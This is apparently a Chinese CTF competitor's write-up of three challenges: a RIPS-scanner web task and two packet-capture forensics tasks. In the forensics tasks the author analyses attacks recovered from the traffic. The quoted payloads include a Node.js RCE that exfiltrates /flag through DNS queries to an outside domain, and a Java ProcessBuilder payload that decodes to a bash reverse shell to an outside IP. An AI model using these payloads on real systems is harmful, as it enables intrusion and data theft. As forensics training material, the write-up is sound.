破阵阁aaa

太好了，又水一集

挺难的，不过好在还是有签到题

代码中的秘密

misc

但是靶机

不过是签到：

查看robots.txt 中发现了 clue。 提示网站可能存在 RIPS 扫描器的遗留文件。访问 /rips/ 路径后，利用 RIPS 扫描器的功能对服务器 web 根目录（/var/www/）进行扫描，从扫描结果的文件列表中发现了一个异常文件 a6e97102-1f98-4c21-a6e1-26611c53b79b.php。访问，获得 flag。

flag{a6e97102-1f98-4c21-a6e1-26611c53b79b}

静影寻踪

取证

描述：于凝固的数字记忆中，追溯那些悄然消逝的涟漪与未言之约。

咱也不懂：

FLAG 消失之谜

取证（那我问你）

描述：我们刚刚监测到一次针对 Web 服务器的精准攻击——攻击者利用漏洞成功窃取了服务器上的敏感文件FLAG。 幸运的是，我们捕获了攻击期间的完整网络流量，但 FLAG 已被攻击者通过某种方式隐藏并外传。

核心逻辑：Web 漏洞利用 (RCE) -> 数据编码 (Base64) -> 通道外带 (DNS OOB)。

1. 攻击流量发现
首先分析 HTTP 流量，寻找攻击入口。通过搜索 POST 请求或 exec、system 等关键字，定位到第 9780 帧附近的恶意请求。

Payload 分析：
攻击者发送了一个 JSON 数据包，其中利用了 Node.js 的 child_process 模块执行系统命令。

process.mainModule.require("child_process").execSync("cat /flag | base64 | tr -d '=' | tr -d '\\n' | xargs -I {} ping -c 1 {}.c07545bc.digimg.store")

行为判定：这是一次利用 Node.js 环境进行的远程代码执行（RCE），并利用 DNS 协议进行数据外带。
2. 数据提取 (DNS Exfiltration)
攻击者将 /flag 的内容进行了 Base64 编码，并移除了填充符 = 和换行符，然后将其拼接到 digimg.store 的子域名中进行 ping 操作。这会导致受害服务器向 DNS 服务器发送查询请求。

过滤 DNS：
在 Wireshark 中使用过滤器 dns 或直接搜索域名 digimg.store。
提取数据：
找到 DNS Query Name 字段，提取主机名前缀：
ZmxhZ3tiOGVmYjJjYS02M2U4LTRkYjYtYWVhNS02YzZkMzRmMDM3NTR
3. Flag 还原
对提取的字符串进行 Base64 解码：

Base64: ZmxhZ3tiOGVmYjJjYS02M2U4LTRkYjYtYWVhNS02YzZkMzRmMDM3NTR
ASCII: flag{b8efb2ca-63e8-4db6-aea5-6c6d34f03754
由于 Base64 编码在传输过程中可能丢失了最后的 fQ== (即 }) 部分（或者被截断），根据 UUID 的标准格式（8-4-4-4-12）验证，Guid 部分 b8efb2ca-63e8-4db6-aea5-6c6d34f03754 是完整的。因此，只需补上最后的 }。

一发入魂

取证。懒得搞了，反正也没奖

描述：这位黑客老哥属实是个讲究人，全程只发一个 HTTP 包，深藏功与名。快来围观这“一发入魂”的骚操作，顺便把 FLAG 领走

flag{4ba8aa22-6703-4107-9a68-9f3c92cccd24}

1. 初步分析

拿到流量包，题目提示“黑客全程只发一个 HTTP 包”，这暗示我们可以通过过滤 HTTP POST 请求来快速定位攻击入口。

在 Wireshark 中使用过滤器：

http.request.method == "POST"

2. 发现攻击流量

筛选后，发现唯一的 POST 请求是发往/ScriptEngine/scriptEngineEval.do的。这是一个典型的命令执行漏洞利用特征。

查看该数据包的实体内容（URL解码后）：

var pb = new java.lang.ProcessBuilder("bash", "-c", "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny43Ni4xODIuMTk1LzUzNTMgMD4mMQ==}|{base64,-d}|{bash,-i}"); pb.redirectErrorStream(true); var p = pb.start(); ...

这段 Payload 利用 Java 的ProcessBuilder执行了一段 Base64 编码的 shell 命令。

3. 解码攻击载荷

提取其中的 Base64 字符串YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny43Ni4xODIuMTk1LzUzNTMgMD4mMQ==进行解码，内容为：

bash -i >& /dev/tcp/47.76.182.195/5353 0>&1

这证实攻击者成功向47.76.182.195:5353建立了一个反弹 Shell。

4. 追踪 TCP 流

既然攻击者已经拿到了 Shell，后续的读取 Flag 操作肯定是在这个反弹连接（TCP流）中进行的。

在 Wireshark 中：

1. 找到目标端口为5353的数据包。
2. 右键点击相关条目 ->Follow->TCP Stream。

在 TCP 流的数据中（通常在流的末尾），可以看到攻击者执行了如下命令：

echo "aGV4ZHVtcCAtdmUgJzEvMSAiJS4yeCInIC9mbGFn" | base64 -d | bash

将这段 Base64 解码，发现攻击者执行的是：

hexdump -ve '1/1 "%.2x"' /flag

这意味着/flag文件的内容被转换成了十六进制纯文本进行回显。

5. 获取 FLAG

在 TCP 流的响应中，找到对应的十六进制输出：
666c61677b34626138616132322d363730332d343130372d396136382d3966336339326363636432347d

将其从 Hex 转换为 ASCII 字符串：

flag{4ba8aa22-6703-4107-9a68-9f3c92cccd24}

咕咕嘎嘎！呃~